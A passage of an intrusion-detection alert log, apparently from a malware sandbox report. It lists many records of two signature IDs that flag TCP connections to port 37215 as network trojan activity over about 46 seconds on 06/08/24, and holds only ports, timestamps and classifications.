          SID:2829579
          Source Port:34700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114477
          SID:2835222
          Source Port:50354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044153
          SID:2829579
          Source Port:42652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.899187
          SID:2835222
          Source Port:50904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743932
          SID:2835222
          Source Port:42868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471116
          SID:2829579
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.846269
          SID:2835222
          Source Port:48026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788418
          SID:2835222
          Source Port:40200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441824
          SID:2829579
          Source Port:35918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.450045
          SID:2835222
          Source Port:51944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732104
          SID:2835222
          Source Port:39380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153468
          SID:2835222
          Source Port:51326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465595
          SID:2835222
          Source Port:42822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798839
          SID:2829579
          Source Port:36610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160401
          SID:2829579
          Source Port:44562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462668
          SID:2829579
          Source Port:37834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444505
          SID:2835222
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466535
          SID:2829579
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912748
          SID:2835222
          Source Port:34858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465969
          SID:2829579
          Source Port:60274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043990
          SID:2835222
          Source Port:37938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297241
          SID:2835222
          Source Port:37764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299593
          SID:2829579
          Source Port:44630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403567
          SID:2829579
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857994
          SID:2829579
          Source Port:33308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173097
          SID:2829579
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175181
          SID:2835222
          Source Port:55754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708455
          SID:2835222
          Source Port:45770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669653
          SID:2829579
          Source Port:50894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787526
          SID:2829579
          Source Port:35400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857904
          SID:2829579
          Source Port:33070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035146
          SID:2829579
          Source Port:50404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670069
          SID:2829579
          Source Port:46324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554715
          SID:2835222
          Source Port:42940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554644
          SID:2835222
          Source Port:33098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355135
          SID:2835222
          Source Port:57496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891058
          SID:2835222
          Source Port:50004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602329
          SID:2835222
          Source Port:50698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136156
          SID:2829579
          Source Port:60398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599352
          SID:2835222
          Source Port:42686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115384
          SID:2835222
          Source Port:46710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020448
          SID:2835222
          Source Port:49766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732172
          SID:2835222
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155741
          SID:2835222
          Source Port:50936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446436
          SID:2829579
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739483
          SID:2829579
          Source Port:56156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745847
          SID:2835222
          Source Port:56554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158889
          SID:2835222
          Source Port:50972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448694
          SID:2829579
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130755
          SID:2835222
          Source Port:53200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463771
          SID:2829579
          Source Port:54490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815430
          SID:2829579
          Source Port:37068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040213
          SID:2835222
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040321
          SID:2829579
          Source Port:46768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041232
          SID:2835222
          Source Port:43520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668542
          SID:2835222
          Source Port:55312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747786
          SID:2835222
          Source Port:57574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405850
          SID:2835222
          Source Port:59762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799860
          SID:2829579
          Source Port:53814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844019
          SID:2829579
          Source Port:60774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017920
          SID:2829579
          Source Port:40878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241347
          SID:2835222
          Source Port:38890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463250
          SID:2829579
          Source Port:42038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406407
          SID:2835222
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266455
          SID:2829579
          Source Port:38048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396256
          SID:2835222
          Source Port:39410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550209
          SID:2829579
          Source Port:58252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510025
          SID:2835222
          Source Port:34320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734916
          SID:2835222
          Source Port:42324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160423
          SID:2835222
          Source Port:33884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160769
          SID:2835222
          Source Port:54382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705207
          SID:2835222
          Source Port:43920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055422
          SID:2829579
          Source Port:33936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160647
          SID:2829579
          Source Port:51006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709788
          SID:2835222
          Source Port:57590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129304
          SID:2835222
          Source Port:33398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161048
          SID:2829579
          Source Port:53240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408737
          SID:2829579
          Source Port:60684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509676
          SID:2835222
          Source Port:46298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463452
          SID:2829579
          Source Port:48088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066347
          SID:2835222
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732041
          SID:2829579
          Source Port:41226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549271
          SID:2829579
          Source Port:53978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599463
          SID:2829579
          Source Port:49650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603260
          SID:2835222
          Source Port:35480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.440875
          SID:2829579
          Source Port:36884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515936
          SID:2829579
          Source Port:35324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706782
          SID:2835222
          Source Port:58114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811103
          SID:2835222
          Source Port:41084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112723
          SID:2835222
          Source Port:36310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164370
          SID:2829579
          Source Port:35392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888079
          SID:2835222
          Source Port:51016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449248
          SID:2835222
          Source Port:45874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667196
          SID:2829579
          Source Port:36966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170733
          SID:2835222
          Source Port:54358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446656
          SID:2835222
          Source Port:60746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744527
          SID:2835222
          Source Port:51258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668021
          SID:2829579
          Source Port:52924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133071
          SID:2829579
          Source Port:55064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783777
          SID:2835222
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853018
          SID:2835222
          Source Port:43726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547844
          SID:2835222
          Source Port:45408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511543
          SID:2829579
          Source Port:43182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159414
          SID:2835222
          Source Port:57930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126498
          SID:2835222
          Source Port:35398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.735515
          SID:2835222
          Source Port:35622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512522
          SID:2835222
          Source Port:55098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019760
          SID:2829579
          Source Port:44292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799347
          SID:2835222
          Source Port:55686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021493
          SID:2829579
          Source Port:38188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405420
          SID:2835222
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114211
          SID:2829579
          Source Port:48436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275448
          SID:2829579
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402063
          SID:2829579
          Source Port:33506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135591
          SID:2835222
          Source Port:50872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709445
          SID:2829579
          Source Port:54186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.516637
          SID:2829579
          Source Port:46086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262387
          SID:2835222
          Source Port:43872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067915
          SID:2835222
          Source Port:44216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353255
          SID:2829579
          Source Port:58040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157712
          SID:2835222
          Source Port:45084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729995
          SID:2829579
          Source Port:44226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732233
          SID:2829579
          Source Port:47286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465969
          SID:2835222
          Source Port:58334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180468
          SID:2829579
          Source Port:43894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731615
          SID:2835222
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740637
          SID:2829579
          Source Port:35154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019547
          SID:2835222
          Source Port:49842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859575
          SID:2835222
          Source Port:40520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890571
          SID:2835222
          Source Port:47756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741596
          SID:2829579
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780717
          SID:2835222
          Source Port:59110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152567
          SID:2829579
          Source Port:36782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730117
          SID:2835222
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351852
          SID:2829579
          Source Port:56332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747523
          SID:2835222
          Source Port:60510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133911
          SID:2829579
          Source Port:37092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276615
          SID:2835222
          Source Port:46152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116497
          SID:2829579
          Source Port:41814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792937
          SID:2835222
          Source Port:47760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352202
          SID:2835222
          Source Port:49890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106160
          SID:2829579
          Source Port:40124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353851
          SID:2835222
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901405
          SID:2835222
          Source Port:47492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461144
          SID:2835222
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.361729
          SID:2829579
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517251
          SID:2835222
          Source Port:41962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817593
          SID:2829579
          Source Port:59994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352202
          SID:2835222
          Source Port:51854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130709
          SID:2829579
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160335
          SID:2829579
          Source Port:48622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739628
          SID:2835222
          Source Port:49906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808646
          SID:2829579
          Source Port:35292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396978
          SID:2829579
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160367
          SID:2829579
          Source Port:42462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672315
          SID:2835222
          Source Port:41354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157320
          SID:2835222
          Source Port:52224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161831
          SID:2835222
          Source Port:54640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177420
          SID:2835222
          Source Port:60740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108726
          SID:2829579
          Source Port:60380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241581
          SID:2835222
          Source Port:35960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706200
          SID:2835222
          Source Port:42568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745584
          SID:2829579
          Source Port:41658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739560
          SID:2835222
          Source Port:36974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811832
          SID:2835222
          Source Port:58454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.739035
          SID:2835222
          Source Port:58476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857528
          SID:2835222
          Source Port:56862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911558
          SID:2835222
          Source Port:32974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236922
          SID:2835222
          Source Port:33086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087929
          SID:2835222
          Source Port:34392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743086
          SID:2829579
          Source Port:50460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732064
          SID:2829579
          Source Port:38982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078821
          SID:2835222
          Source Port:60218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306346
          SID:2829579
          Source Port:49982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897572
          SID:2835222
          Source Port:49834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274421
          SID:2829579
          Source Port:33510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355485
          SID:2829579
          Source Port:35636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518073
          SID:2835222
          Source Port:48940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106341
          SID:2829579
          Source Port:53752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178093
          SID:2835222
          Source Port:34652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911521
          SID:2835222
          Source Port:34926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837521
          SID:2835222
          Source Port:52896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261144
          SID:2829579
          Source Port:57136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890529
          SID:2835222
          Source Port:37924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816662
          SID:2835222
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042329
          SID:2835222
          Source Port:43926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732454
          SID:2835222
          Source Port:50070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743133
          SID:2829579
          Source Port:53154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442446
          SID:2835222
          Source Port:43548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731143
          SID:2835222
          Source Port:53060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743067
          SID:2835222
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517783
          SID:2835222
          Source Port:33522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706672
          SID:2829579
          Source Port:55906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467095
          SID:2829579
          Source Port:42890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857848
          SID:2829579
          Source Port:44418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264751
          SID:2835222
          Source Port:37220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551405
          SID:2829579
          Source Port:55198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843997
          SID:2835222
          Source Port:38414
          Destination Port:37215
